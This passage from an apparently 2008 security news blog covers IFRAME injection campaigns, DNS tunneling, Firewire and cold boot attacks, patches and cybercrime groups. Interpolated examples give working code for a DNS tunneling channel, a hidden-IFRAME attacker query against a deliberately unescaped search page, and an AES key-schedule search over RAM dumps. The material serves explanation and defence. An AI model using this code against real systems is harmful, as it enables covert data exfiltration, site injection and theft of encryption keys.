According to an official of Taiwan's Ministry of National Defense, in 2006, Taiwan detected 13 PLA zero-day attacks launched within Microsoft applications and experienced a total of 178 days of vulnerability between notifying Microsoft of the attacks and receiving the appropriate patches. One PowerPoint-based attack was so sophisticated that it took Microsoft engineers over two months to construct a patch.[28] In spring 2006, a certain foreign "coast guard agency" discovered a covert program imbedded in its network that systematically searched for shipping schedules and then forwarded them to an e-mail address in China.[29]

Tuesday

More high profile sites getting iframe injections



After CNET, other high-profile sites like Wired.com are getting IFRAME injections. And our friends of the RBN seem to be involved (again). Another excellent analysis by Dancho Danchev:
Key summary points :

- the same malicious parties behind the CNET and TorrentReactor's IFRAME injection are also the ones behind Wired.com and History.com's abuse of input validation
- the IFRAME injection entirely relies on the lack of input validation within their search engines, making it possible to submit executable code that therefore automatically executes upon accessing the cached page with a popular search query
- many other domains have been introduced within the IFRAMEs, a complete list of which you can find in this post, several directly hosted within RBN's network
- the main domain serving the heavily obfuscated VBS malware is located within the Russian Business Network's known netblocks
- given the high page ranks of the current and the previous targets, it is evident that the malicious parties are prioritizing based on the possibility to abuse input validation on high page-ranked sites, presumably in an automated fashion
- Keep It Simple Stupid works: since they cannot find a way to embed the IFRAME at these hosts, a clear indication of the fact that they have breached them, they figured out a way to inject the IFRAMEs and again take advantage of the high page ranks to attract traffic by gaining on popular keywords, or any kind of keywords that they want to

Read the full article.

Monday

Speeding up DNS tunneling (updated)



An interesting article from Cyberphobia: Speeding up DNS tunneling.

Yes, DNS tunneling with OzymanDNS is slow (as described in my previous posting). Let’s try to speed it up a little bit.

If you have a closer look at the code, you’ll notice that the upstream is implemented by sending the data base32 encoded in long A DNS requests in chunks of 110 bytes (domain names may be up to 256 characters long, with dots at least every 64 characters). Due to base32 encoding and the required dots we can’t gain much here. Thankfully, in most cases we don’t need much upstream anyway.

Full article here.

UPDATE (10/03/2008): His code is now online: DNS Tunneling - Updated Source
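The upstream limit the article describes follows from the DNS name format itself, so it is worth seeing the arithmetic. The following is an added example, not OzymanDNS's code and not from the Cyberphobia post: it packs bytes into query names and works out how many raw bytes fit in one name for a given tunnel domain. It enforces the RFC 1035 limits (a label is at most 63 octets, a name at most 255 octets on the wire, which is 253 characters in text form) and uses base32 because DNS names are case-insensitive, so base64 would not survive a resolver. The tunnel domain t.example and the numeric sequence label are assumptions of the example; OzymanDNS's own chunk size of 110 bytes and its label layout are its own choices.

```python
# Added example, not OzymanDNS's code. Packs upstream bytes into DNS query names
# of the form <base32 data labels>.<seq>.<domain> within the RFC 1035 limits.
# TUNNEL_DOMAIN is an assumption; the sample payload in __main__ is constructed.
import base64

MAX_LABEL = 63                 # RFC 1035: a label is at most 63 octets
MAX_NAME = 253                 # a 255-octet wire name is at most 253 characters in text form
TUNNEL_DOMAIN = "t.example"    # assumption: the domain the tunnel server is authoritative for


def chunk_capacity(domain=TUNNEL_DOMAIN, seq="0"):
    """Raw bytes that fit in one query name for this domain and sequence label."""
    # characters left for the data labels plus the dot that follows each of them
    budget = MAX_NAME - len(domain) - len(seq) - 1
    full, rest = divmod(budget, MAX_LABEL + 1)     # each full label costs 63 chars + its dot
    chars = full * MAX_LABEL + max(rest - 1, 0)    # a partial label needs room for its own dot
    return chars * 5 // 8                          # base32: 5 raw bytes -> 8 characters


def encode_chunk(seq, data, domain=TUNNEL_DOMAIN):
    """Client side: one chunk -> one query name (base32, padding stripped, split into labels)."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    name = ".".join(labels + [str(seq), domain])
    if len(name) > MAX_NAME:
        raise ValueError(f"{len(data)} bytes do not fit: name would be {len(name)} chars")
    return name


def decode_query(name, domain=TUNNEL_DOMAIN):
    """Server side: query name -> (seq, bytes). Resolvers may change case, hence upper()."""
    suffix = "." + domain
    if not name.endswith(suffix):
        raise ValueError("not a tunnel query")
    labels = name[:-len(suffix)].split(".")
    seq = int(labels[-1])
    text = "".join(labels[:-1]).upper()
    text += "=" * (-len(text) % 8)                 # restore the base32 padding
    return seq, base64.b32decode(text)


def encode_stream(data, domain=TUNNEL_DOMAIN):
    """Split data into numbered chunks, each sized to fill one query name."""
    names, seq, pos = [], 0, 0
    while pos < len(data):
        size = chunk_capacity(domain, str(seq))
        names.append(encode_chunk(seq, data[pos:pos + size], domain))
        pos += size
        seq += 1
    return names


def decode_stream(names, domain=TUNNEL_DOMAIN):
    """Reassemble in sequence order; queries may arrive out of order or duplicated."""
    parts = dict(decode_query(n, domain) for n in names)
    return b"".join(parts[i] for i in sorted(parts))


if __name__ == "__main__":
    payload = b"GET / HTTP/1.0\r\n\r\n" * 40       # constructed sample upstream data
    queries = encode_stream(payload)
    print(f"{len(payload)} bytes -> {len(queries)} A queries of at most {chunk_capacity()} bytes each")
    print(queries[0])
```

Every character of the domain and of any bookkeeping label (sequence number, session id) comes straight out of the data budget, and base32 costs 8 characters per 5 bytes, so a query can never carry more than roughly 150 bytes upstream even with a very short domain. That, plus one round trip per query, is the slowness the post is trying to work around; downstream (TXT or CNAME answers) has more room, which is why the author says upstream matters less.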

Sunday

Podcast: Hak.5 Episode 3x08 -- Shmoocon Special



Hak5 released their Shmoocon Special. This special lasts 1h26m. Perfect for my train ride to work tomorrow.

In this episode we head to Washington DC for Shmoocon, the only security conference with foam projectiles. We converse with Renderman about hacking and con-going. Scott Moulton provides insight on recovery and forensics with solid state disks. Mati Aharoni aka Muts tells us all about Backtrack and offensive-security. Dan Griffin debuts some new security tools for Vista. David Hulton aka H1kari talks about his research intercepting and cracking GSM traffic. And Chris Compton & Co bring us the latest from Hack or Halo.

Saturday

Invasion of the (belgian) iPhone users


So the iPhone SDK has been presented to the world. As I guessed, Apple has now announced a lot of new features aimed at enterprises:

  • push mail
  • push contacts
  • push calendar
  • global address list
  • cisco vpn ipsec
  • certificates and identities
  • WPA2 / 802.1X
  • enforced security policies
  • device configuration tools
  • remote wipe
So it is aiming at BlackBerry and might more easily find enterprise adoption now. I saw an article mentioning that the iPhone will come to Belgium in May. It will be a SIM-lock-free version, but at a higher price, and it will work with all three mobile operators. Nevertheless, we have already seen people in Belgium carrying jailbroken iPhones, so they have been among us for some months now. I think CIOs need to take these people into account, because some of them will want to sync their phone with their email and contacts, especially the VIP users. Just saying no will probably lead to individuals trying to circumvent security controls, like forwarding all their mail to a public account which they can sync with their iPhone.

Last juicy detail: Apple licensed the ActiveSync protocol from Microsoft. This will enable Apple to build support for Microsoft Exchange directly into the iPhone.

I haven't seen any mention of data encryption, so I'll look into that in the next days. One thing is sure: keep an eye out for those gadget-loving people with an iPhone in your corporation. The countdown has started.

Friday

CNET Sites Under IFRAME Attack



Dancho Danchev has a very good analysis of the IFRAME injection attack on several CNET sites. It shows that you don't have to surf on the dark side of the web to get infected: banners, SEO poisoning and IFRAME injections are successful ways to infect unpatched users.

With the recent IFRAME injection attack targeting ZDNet Asia, by abusing the site's search engine caching capabilities in combination with the lack of input sanitization, several more CNET Networks' web properties besides ZDNet Asia, namely TV.com, News.com and MySimon.com, are currently getting targeted using the same technique to inject the IFRAMEs and have the sites cache and locally host the results. The following assessment outlines the IPs and domains used in the IFRAMEs, the domains and IPs hosting the rogue anti-virus and anti-spyware applications, as well as the detection rates of the applications.

Full analysis here.
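Both analyses (this one and the Wired.com/History.com post above) come down to the same defect: the search page echoes the query into its HTML without escaping it, and the rendered page is then cached and served to everyone who arrives with the same query. The following is an added example, not code from CNET, Dancho Danchev or anyone else: a toy search front-end in the vulnerable form and the fixed form, with a cache in front of it so you can see why one poisoned query keeps paying off. The template, the class and function names, the search.example base URL and the attacker query with its bad.example domain are all assumptions of the example.

```python
# Added example, not code from any of the sites or analyses mentioned. Shows a
# search page that reflects the query unescaped next to the fixed version, and
# the per-query cache that turns one poisoned query into a hosted IFRAME.
# ATTACKER_QUERY, TEMPLATE and the URLs are constructed for this example.
import html
from urllib.parse import quote

# Constructed attacker query: a hidden IFRAME riding in on an ordinary search term.
ATTACKER_QUERY = 'linux <iframe src="http://bad.example/x.htm" width=0 height=0></iframe>'

# Hypothetical results template that echoes the query back in the heading.
TEMPLATE = "<html><body><h1>Results for: {query}</h1><ul>{items}</ul></body></html>"


def render_results_vulnerable(query, results):
    """Echoes the raw query and result titles into HTML: markup in either becomes live."""
    items = "".join(f"<li>{r}</li>" for r in results)
    return TEMPLATE.format(query=query, items=items)


def render_results_fixed(query, results):
    """Escapes every untrusted value at the point where it enters the HTML."""
    items = "".join(f"<li>{html.escape(r)}</li>" for r in results)
    return TEMPLATE.format(query=html.escape(query), items=items)


class SearchFrontEnd:
    """Toy front-end that caches rendered pages per query. This is the behaviour
    the attackers relied on: once the poisoned query has been rendered, every
    later visitor with that query (e.g. via a search-engine link) gets the IFRAME."""

    def __init__(self, render):
        self.render = render
        self.cache = {}

    def lookup(self, query):
        # stand-in for the real index: one result title that repeats the query
        return [f"Article about {query}"]

    def get(self, query):
        if query not in self.cache:
            self.cache[query] = self.render(query, self.lookup(query))
        return self.cache[query]


def has_live_iframe(page):
    """Is there an IFRAME tag the browser would actually act on?"""
    return "<iframe" in page.lower()


def poisoned_link(base="http://search.example/?q="):
    """The link an attacker seeds on other sites so crawlers index the cached page."""
    return base + quote(ATTACKER_QUERY)


if __name__ == "__main__":
    for label, render in (("vulnerable", render_results_vulnerable), ("fixed", render_results_fixed)):
        page = SearchFrontEnd(render).get(ATTACKER_QUERY)
        print(f"{label}: live IFRAME = {has_live_iframe(page)}")
    print("seeded link:", poisoned_link())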

Java patches out and MS Office patches on the horizon



As could have been expected, Microsoft has issued its Security Bulletin Advance Notification, indicating that the March release cycle will contain four bulletins, all with the severity rating Critical. The notification states that these Critical bulletins are for Microsoft Office and Office Web Components. The release is scheduled for Tuesday, March 11, 2008.

Additionally, Sun has released security updates for Java SE. These updates address multiple vulnerabilities in Java Web Start, the JDK, the JRE and the SDK. They may allow a remote attacker to execute arbitrary code, bypass security restrictions or cause a denial of service. Don't forget that installing the new version won't uninstall the old one: you have to remove it yourself, otherwise the old, vulnerable runtime stays on the system.

  • Sun Alert 233321 - Two Security Vulnerabilities in the Java Runtime Environment Virtual Machine
  • Sun Alert 233322 - Security Vulnerability in the Java Runtime Environment with the Processing of XSLT Transformations
  • Sun Alert 233323 - Multiple Security Vulnerabilities in Java Web Start May Allow an Untrusted Application to Elevate Privileges
  • Sun Alert 233324 - A Security Vulnerability in the Java Plug-in May Allow an Untrusted Applet to Elevate Privileges
  • Sun Alert 233325 - Vulnerabilities in the Java Runtime Environment image Parsing Library
  • Sun Alert 233326 - Security Vulnerability in the Java Runtime Environment May Allow Untrusted JavaScript Code to Elevate Privileges through Java APIs
  • Sun Alert 233327 - Buffer Overflow Vulnerability in Java Web Start May Allow an Untrusted Application to Elevate its Privilege

Unlock a Windows PC without the password through Firewire (UPDATED)



During the whole "disk encryption defeated by RAM attack" story, I mentioned that FireWire could be used for memory forensics since it provides DMA (direct memory access). Apparently, it can also be used to unlock a Windows PC without a password.

A security consultant based in New Zealand has released a tool that can unlock Windows computers in seconds without the need for a password.
Adam Boileau first demonstrated the hack, which affects Windows XP computers but has not yet been tested with Windows Vista, at a security conference in Sydney in 2006, but Microsoft has yet to develop a fix.

Interviewed in ITRadio's Risky Business podcast, Boileau said the tool, released to the public today, could "unlock locked Windows machines or login without a password ... merely by plugging in your Firewire cable and running a command".

Full article (Source: smh.com.au)

The code can be downloaded here.

UPDATE (06/03/2008): I didn't mention it clearly, but even if you don't have a FireWire port, having a PCMCIA slot is just as dangerous, since a FireWire card can simply be plugged in. I even saw remarks that external SATA ports also provide DMA access. I feel more tools coming our way.

Using a laptop with built-in Firewire and booted with the Helix Linux LiveCD (designed for forensics and incident response) that includes Adam’s original Python Firewire tools (minus winlockpwn which I downloaded once booted), I tested my theory by plugging in a cheap StarTech PCMCIA Firewire card to the target laptop running Windows XP SP2 whose screen was locked. I gave the target a few seconds to load the drivers, and then connected my attack laptop’s Firewire port to the PCMCIA Firewire port. After running winlockpwn, I logged into the target laptop with a few random keystrokes (which were not the password). Voila! No need for the victim to have Firewire built in. (Source: Darkreading.com)

UPDATE (07/03/2008): It also works against Vista.

In this paper, we demonstrate that the firewire unlock attack (as implemented in Adam Boileau's winlockpwn) can be used against Windows Vista.

The paper is available at:

http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf

UPDATE (29/03/2008): I have written a tutorial.

Wednesday

Fun: How to detect your son is a computerhacker



I just wanted to share this little gem with you. Lunix... mwahaha... Flash is a hacker tool and asking for an AMD processor is a cause for concern. Beware of the haxxor!

Is Your Son a Computer Hacker?

Report: March Symantec State of Spam


From Symantec:

Social engineering was the driving force behind spammers during the month of February. While overall spam volume hovered steadily at 78.5% of email and tactics remained relatively the same, the use of events, big brands, and public figures drove spam campaigns during the month. The March State of Spam report highlights several of these.

Read full report.

A tool to use the cold boot encryption attack


About a week ago, some researchers demonstrated how encryption keys can be retrieved from memory if the attacker has physical access to a computer that is switched on or in standby.

Someone from McGrew Security released a tool called msramdmp that does just that. He put together a utility that runs under syslinux to capture the data and installed it on a USB thumb drive. The result is a device that boots on a machine and copies the contents of RAM before they get overwritten.

The Princeton researchers applied this method to the recovery of encryption keys, with great results. They also cooked up a way to image the contents of RAM with a very small footprint, only overwriting a small amount of memory in the process. Unfortunately, at the time of writing this, their tool, ram2usb, hasn't been released. I decided that it wouldn't be hard to go ahead and implement one myself, based off their paper and youtube video posted above, so that I (and others) can go ahead and start having fun.

So, as a small side project, I've written "msramdmp", the McGrew Security RAM Dumper. Enjoy!
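Dumping the RAM is only half of the attack; the other half is finding the key in a few hundred megabytes of dump. What makes it findable is not the 16 raw key bytes, which look like any other 16 bytes, but the expanded key schedule that every AES implementation keeps next to them. The following is an added example, not the Princeton team's tool and not msramdmp: it does the search the Princeton paper describes for AES-128, sliding a window over the image, expanding each 16-byte candidate and checking whether the 160 bytes that follow are its round keys. The memory image is constructed (seeded random filler with one schedule planted in it) and the key is the FIPS-197 test key. A practical tool additionally tolerates the bit errors that decaying DRAM introduces; this example requires an intact schedule.

```python
# Added example, not the Princeton tool or msramdmp. Finds AES-128 keys in a
# memory image by recognising their expanded key schedule. The image below is
# constructed; FIPS_KEY is the FIPS-197 Appendix A.1 test key.
import random

# --- AES-128 key expansion, written out so the search has no dependencies ---

def _xtime(a):
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    a <<= 1
    return (a ^ 0x1B) & 0xFF if a & 0x100 else a


def _gf_mul(a, b):
    p = 0
    while b:
        if b & 1:
            p ^= a
        a = _xtime(a)
        b >>= 1
    return p


def _build_sbox():
    """S-box = affine transform of the multiplicative inverse (FIPS-197 5.1.1)."""
    sbox = bytearray(256)
    for x in range(256):
        inv = 0
        if x:
            inv = 1
            for _ in range(254):        # x^254 == x^-1 in GF(2^8)
                inv = _gf_mul(inv, x)
        s = inv
        for shift in (1, 2, 3, 4):      # s ^= rotl(inv, shift)
            s ^= ((inv << shift) | (inv >> (8 - shift))) & 0xFF
        sbox[x] = s ^ 0x63
    return bytes(sbox)


SBOX = _build_sbox()
RCON = (0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36)
SCHEDULE_LEN = 176                      # 11 round keys of 16 bytes


def _next_round_word(prev_word, word_4_back, round_index):
    """w[i] for i % 4 == 0: w[i-4] ^ SubWord(RotWord(w[i-1])) ^ Rcon."""
    t = bytearray(SBOX[b] for b in prev_word[1:] + prev_word[:1])
    t[0] ^= RCON[round_index]
    return bytes(a ^ b for a, b in zip(word_4_back, t))


def expand_key_128(key):
    """Return the 176-byte AES-128 key schedule."""
    if len(key) != 16:
        raise ValueError("AES-128 key must be 16 bytes")
    w = [bytes(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        if i % 4 == 0:
            w.append(_next_round_word(w[i - 1], w[i - 4], i // 4 - 1))
        else:
            w.append(bytes(a ^ b for a, b in zip(w[i - 4], w[i - 1])))
    return b"".join(w)


def find_aes128_keys(image):
    """Return (offset, key) for every position holding a complete AES-128 schedule.

    Cheap filter first: only the first derived word (bytes 16..19) is computed
    and compared, so the full expansion runs only for the rare survivors."""
    hits = []
    for off in range(len(image) - SCHEDULE_LEN + 1):
        key = image[off:off + 16]
        if image[off + 16:off + 20] != _next_round_word(key[12:16], key[0:4], 0):
            continue
        if image[off:off + SCHEDULE_LEN] == expand_key_128(key):
            hits.append((off, bytes(key)))
    return hits


FIPS_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # FIPS-197 A.1 test key


def build_sample_image(key=FIPS_KEY, planted_at=5000, size=16384, seed=7):
    """Constructed stand-in for a RAM dump: seeded random filler with one schedule in it."""
    rnd = random.Random(seed)
    image = bytearray(rnd.getrandbits(8) for _ in range(size))
    image[planted_at:planted_at + SCHEDULE_LEN] = expand_key_128(key)
    return bytes(image)


def demo():
    """Scan the constructed image; expect the planted key at its offset."""
    return find_aes128_keys(build_sample_image())


if __name__ == "__main__":
    for off, key in demo():
        print(f"AES-128 key schedule at offset {off:#x}: key {key.hex()}")
```

The same idea carries over to AES-256 (a 240-byte schedule) and, with a different structure to look for, to RSA private keys. Note what this means for the defence side: as long as the key schedule sits in RAM in the clear, which it must while a volume is mounted, a dump taken within the first minutes after power-off contains everything needed. Hibernation files and crash dumps are the same problem on disk.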

Webbased Google Hacking Database Tool launched



On the heels of Goolag, GNUCITIZEN launches its web-based Google Hacking Database tool. No need to install software:

I am happy to inform you that I've been doing some work on our Google Hacking Database Tool lately. The tool is now pretty stable and it has a better looking, and a lot more intuitive, interface. You can enjoy the tool right now from here, as it is entirely web-based.

Tuesday

Storm Worm/Nuwar is beginning a new wave

After its Xmas campaign and its Valentine campaign, it's back to generic e-card spam.

More details:

From hearts to postcards, storms back (SANS ISC)
Storm Reactivating (F-Secure)
Nuwar’s New Wave (McAfee Avertlabs)

Why are antivirus products having a hard time?



I really respect the people who make anti-malware software. Malware writers are not making it easy for them. Before we move on to this topic, let's first provide some terminology, courtesy of anti-virus rants:

Now, let's talk about 2 reasons why AV products are having a hard time:

1. They use software to test whether AV scanners (fail to) detect their creations before releasing them:

When VirusTotal was born a few years ago, some people were claiming that it was being used by malware developers to test their creations. In some cases, we knew it was true, as we have seen some advertisements in forums showing the scanning results from VirusTotal claiming that certain malware was not detected by any vendor. On January 3rd, VirusTotal decided to remove the option "Do not distribute the sample", so each and every file could be sent to any antivirus vendor.

Since then, we have seen that some underground communities have retaken several projects that allow users to have a tool for analysing their creations. This is one of the first tools that have been used, known as KIMS

Read full article @ Pandablog

2. They use packers to obfuscate their executables and try to customize them:

Malware authors often use their own protections or packers to prevent automated unpacking of their executables. This is an attempt to delay development of antivirus (AV) signatures or in-depth behavioral analysis. Scramblers, tools designed to modify the packed binary to help throw off signature-based scanners, are often used as well. In fact, a public protector called [MSLRH] not only packs the executable and protects it using anti-debug, anti-dump, and stolen-byte mechanisms, but also offers the option to choose which protector the executable should appear as in PEiD and other signature-based scanners. [MSLRH] then places the typical byte sequence of that packer at the entry point of the executable, likely throwing off some analysts and automated unpackers. This type of tool is also used by legitimate software authors to protect their intellectual property.


Read full article @ Websense


Webcast: "Penetration Testing Ninjitsu"



Here is the recorded version of “Penetration Testing Ninjitsu” with Ed Skoudis and here are the slides. It's some basic stuff but still fun to watch. For the advanced stuff, you have to take his course.

Monday

Deming’s Seven Deadly Diseases applied to Information Security



Riskanalys.is has an excellent piece on the seven deadly diseases and how to convert them to information security:

As we look at the father of quality management and see if he’s got any relevance to what we’re doing (after all, security could be said to be a key aspect of IT Quality of Service), we come across what Deming calls the Seven Deadly Diseases. These are things that cause business to perform poorly. I’ve been thinking about analogues for us as I’ve read them, and some of my comparisons might be a stretch of interpretation, but I think these are not unimportant for us to meditate on a little.

Read more.

Yet another (0-day) office exploit



Pandalabs might have discovered a 0-day in MS Access. I'm trying to see if this is confirmed by others. As if we didn't have enough issues with (other) MS Office documents up till now. There is still an unpatched Excel vulnerability on the loose.

Last week, John Fellers sent us a sample that exploited a flaw in MS Access. We thought it was the same vulnerability sent to Bugtraq in November and announced by McAfee in December. However, a deeper analysis reveals that it's a new vulnerability. We are still analyzing the exploit to find out more information, though at first sight it seems to be a flaw in Jet Engine (msjet40.dll).

A simple search in Google (with the name of the mdb file as the query) reveals it was sent to a public forum in Nabble in February. Although these vulnerabilities allow remote code execution, Microsoft replied that they would not fix these mdb vulnerabilities, as it seems they will not acknowledge vulnerabilities which are from .mdb files:

"You appear to be reporting an issue with a file type Microsoft considers to be unsafe. Many programs, such as Internet Explorer and Outlook, automatically block these files. For more information, please visit http://support.microsoft.com/kb/925330"

Central Belgian warning system against internet fraud



Information Sharing and Analysis Centers (ISACs) are a critical tool in case of targeted attacks. The methodology of the attack can be shared so that other organizations can check their systems for a similar compromise or improve their preventive controls to avoid one. We have organizations like ISSA, OWASP and ISACA, but their role today does not cover the kind of detailed information sharing an ISAC could provide. This is why I was quite happy when I saw the following article from Datanews (translated for you):

All banks will soon be connected to a computer system with which they can rapidly alert other banks in case of fraud. This should be a solution to the coordinated attacks seen on Belgian internet banking accounts, says "De Tijd".

The warnings will be anonymous so that other banks won't know which competitor was the victim.

...
According to Reynders, up till now, there are only 59 known cases of compromised online accounts of which 34 were during last year. In other countries, these figures are a lot higher.


I would say, kudos for this initiative. I would like to see this expanded (or created) for other sectors and companies as well. Maybe a real national Belgian CERT (which we lack at the moment)?

VMWorld Europe: An update on security features



This might be the result of the acquisition of Determina last year:

CANNES, France, Feb. 27 /PRNewswire-FirstCall/ -- VMware, Inc. (NYSE: VMW - News), the global leader in virtualization solutions from the desktop to the datacenter, today announced new security technology called VMware VMsafe(TM) that protects applications running in virtual machines in ways previously not possible in physical environments. The VMsafe APIs allow vendors to develop advanced security products that combat the latest generation of malware. VMsafe technology integrates into the VMware hypervisor and provides the transparency to prevent threats and attacks such as viruses, trojans and keyloggers from ever reaching a virtual machine. Twenty security vendors have embraced VMsafe technology and are building products that will further enhance the security of virtual machines, making the virtual environment unmatched in the level of security and protection it provides compared to physical systems. (Source: Yahoo) (Thanks Jon)

The RTFM blog also covered the technology: VMworld 2008 Europe: Day Two: Key Note

The rest of his coverage of the event might also be worth reading.

UPDATE: Critical VMware Security Alert for Windows-Hosted VMware Workstation, VMware Player, and VMware ACE

Updated paper on the Russian Business Network


First, I want to acknowledge the work David Bizeul put into his 70-page paper last November. But soon after that, the Russian Business Network went into hiding. Some reports talked about them setting up shop in Taiwan, China and Turkey. Thanks to the folks at Shadowserver, we are getting a good update about their current whereabouts:

In the last few months, there has been a significant amount of press coverage given to insidious cyber activity associated with the segment of the Internet known as the “Russian Business Network,” or RBN. Previous studies have suggested that the RBN has ties to nearly every area of cybercrime, including: phishing, malware, DDOS activity, pornography, botnets, and anonymization.

In November 2007, media reporting indicated that a large portion of the RBN “went dark.” Since that time, the Shadowserver Foundation has been more closely analyzing outlying networks implicated as being associated with RBN. One of these suspected outliers is AS9121, known as TurkTelekom. SecurityZone.org reported in early December 2007 that while not everything in TurkTelekom appears to be malicious, there are some ranges that are “particularly bad” and analysis of Shadowserver Foundation data agrees. Several subranges quickly stand out as being deeply involved in malicious cyber activity: 88.255.90.0/24 and 88.255.94.0/24. IP registration indicates these ranges are listed under the name “ABDALLAH INTERNET HIZMETLERI” (AIH).


Download report (pdf).